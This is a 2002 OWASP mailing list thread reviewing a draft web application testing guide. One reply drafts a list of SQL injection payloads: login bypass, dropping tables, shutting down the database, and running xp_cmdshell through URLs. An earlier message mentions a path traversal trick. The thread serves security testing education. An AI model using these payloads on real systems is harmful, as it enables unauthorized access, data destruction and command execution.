[OWASP-TESTING] Paper review

Kartik Trivedi javapro13 at hotmail.com
Wed Dec 4 17:11:24 EST 2002


Hi David,

To start with, how does this look

<head>Bypassing Authentication</head>
To authenticate without any credentials
         Username: ' OR "='
         Password: ' OR "='
To authenticate with just the username
        Username: admin'--
To authenticate as the first user in user's table
        Username: ' or 1=1--
To authenticate as a fictional user
        Username: ' union select 1, 'user', 'passwd' 1--

</head>Causing Destruction</head>
To drop a database table
     Username: ';drop table users--
To shutdown the database remotely
     Username: aaaaaaaaaaaaaaa'
     Password: '; shutdown--

<head>Executing Function calls and stored procedures </head>
Executing xp_cmdshell to get directory listing
 http://localhost/script?0';EXEC+master..xp_cmdshell+'dir';--
Excuting xp_servicecontrol to manipulate services
 http://localhost/script?0';EXEC+master..xp_servicecontrol+'start',+'server'
;--


I am sure there is much more to add..

Thanks
Kartik


----- Original Message -----
From: "David Endler" <DEndler at iDefense.com>
To: "'zeno'" <zeno at cgisecurity.net>
Cc: <owasp-testing at lists.sourceforge.net>
Sent: Wednesday, December 04, 2002 1:45 PM
Subject: RE: [OWASP-TESTING] Paper review


> Good feedback here far as well.  Sounds like you're saying we need more
> pretty pictures to keep people interested ;-)
>
> On another topic, does anyone feel comfortable making an attempt at SQL
> injection?
>
> -dave
>
> > -----Original Message-----
> > From: owasp-testing-admin at lists.sourceforge.net
> > [mailto:owasp-testing-admin at lists.sourceforge.net]On Behalf Of zeno
> > Sent: Tuesday, December 03, 2002 7:54 PM
> > To: David Endler
> > Cc: 'owasp-testing at lists.sourceforge.net'
> > Subject: [OWASP-TESTING] Paper review
> >
> >
> > Hola,
> >
> >
> > "Regulatory requirements"
> >
> > You wanted some examples of country regulations. Why don't we
> > mention crypto export limitations?
> > Great example that should be covered. Maybe something about
> > the bill passed in the 1990's about
> > illegal export of strong encryption outside the USA bla bla bla .
> >
> >
> > Moving on (nice graphs BTW :p)
> >
> > The image looks fine near the Intro to owaps testing
> > methodology. Anyone else object?
> >
> > Interviewing the stakeholders is a nice touch.
> >
> > *maybe* have a flowchart containing "Obtaining documentation".
> >  People like perty easy to understand pictures :)
> >
> >  Under obtaining source code perhaps mention that gaining
> > sourcecode via blackboxing may be possible.
> > A simple example could be exploiting a perl script and having
> > it load itself bah.pl?file=../bah.pl.
> > This can happen with other interprated languages also like
> > ASP, perl, python, etc..
> > Nothing to talk to much in detail though.
> >
> > Under preparing tools in that list maybe we should mention
> > something in regards to checking
> > for permissions of files? File handle monitors seems broad
> > like "I am monitoring what is used" but
> > doesn't immediatly ring the bell of "should check permissions
> > in regards to local, roaming, and public(everyone) users.
> >
> > Under listening http ports
> >
> > You give tips for checking ports 80 and 443. Perhaps mention
> > 8080 since it usually is a proxy port,
> > or alt webserver port. Perhaps "test for proxy usage" *maybe*
> >
> > Under server versioning I would include "http banner order,
> > default error pages, max connections, etc..)
> > I'm actually working on a NICE big detailed paper on
> > fingerprinting webservers. It will cover manually
> > and Ihope fr it to be rather extensive. (also see
> > whitehatsec.com blahat server fingerprinter tool)
> >
> >
> > HTTP Server extensions
> >
> > Also add apache modulkes to this. Seems a little to IIS'ish to me.
> >
> >
> > HTTP Methods supported
> >
> > You ask if we should provide examples on each. Obviously it
> > could be helpful. Perhaps include
> > HEAD, GET, and POST. As much as I'd like to learn more about
> > TRACE this document is a web security paper
> > and unless we dedicate
> > alot of time (like lan mapping/cache networks) perhaps we
> > should limit it to the 3 most popular/used methods.
> >
> >
> > Old, Backup or un-referenced files
> >
> > Include that smome editors create files like file.txt~ when
> > being edited. Perhaps include a general "editor" reference.
> >
> >
> > File extension Handling
> >
> > It mentions http://www.host.com. May want to do http://host/
> > for legal reasons? Same with rest of document.
> >
> >
> > Unsafe modules
> >
> > Everything from SQL access, usernames/passwords to sections
> > of your site, to paths to important files can be obtained
> > both locally, and in some cases(when specifically allowed) remotely.
> >
> > perhaps make (when specifically allowed, or misconfigured).
> > People don't say "Hey why don't I misconfigure
> > my machine for people to hack me with".
> >
> >
> > Page 38
> >
> > n this example we are going to send a request to a news
> > application which includes data from other file and displays it.
> >
> > I assume is
> >
> > "includes data from another file and displays it"
> >
> >
> > Direct OS commands
> >
> > Nice use of showing which functions to watch out for.
> >
> >
> >
> > I would also perhaps add more flowcharts or something along
> > those lines. Yeah it sounds silly but
> > when I'm reading a 60+ page document flowcharts are a nice
> > break and re etterate what I just read.
> > If I'm sounding like a moron just let me know I'm tired :p
> >
> > - bob
> >
> > ps: looks good
> >
> >
> >
> > -------------------------------------------------------
> > This SF.net email is sponsored by: Microsoft Visual Studio.NET
> > comprehensive development tool, built to increase your
> > productivity. Try a free online hosted session at:
> > http://ads.sourceforge.net/cgi-bin/redirect.pl?micr0003en
> > _______________________________________________
> > owasp-testing mailing list
> > owasp-testing at lists.sourceforge.net
> > https://lists.sourceforge.net/lists/listinfo/owasp-testing
> >
>
>
> -------------------------------------------------------
> This SF.net email is sponsored by: Microsoft Visual Studio.NET
> comprehensive development tool, built to increase your
> productivity. Try a free online hosted session at:
> http://ads.sourceforge.net/cgi-bin/redirect.pl?micr0003en
> _______________________________________________
> owasp-testing mailing list
> owasp-testing at lists.sourceforge.net
> https://lists.sourceforge.net/lists/listinfo/owasp-testing
>




More information about the Owasp-testing mailing list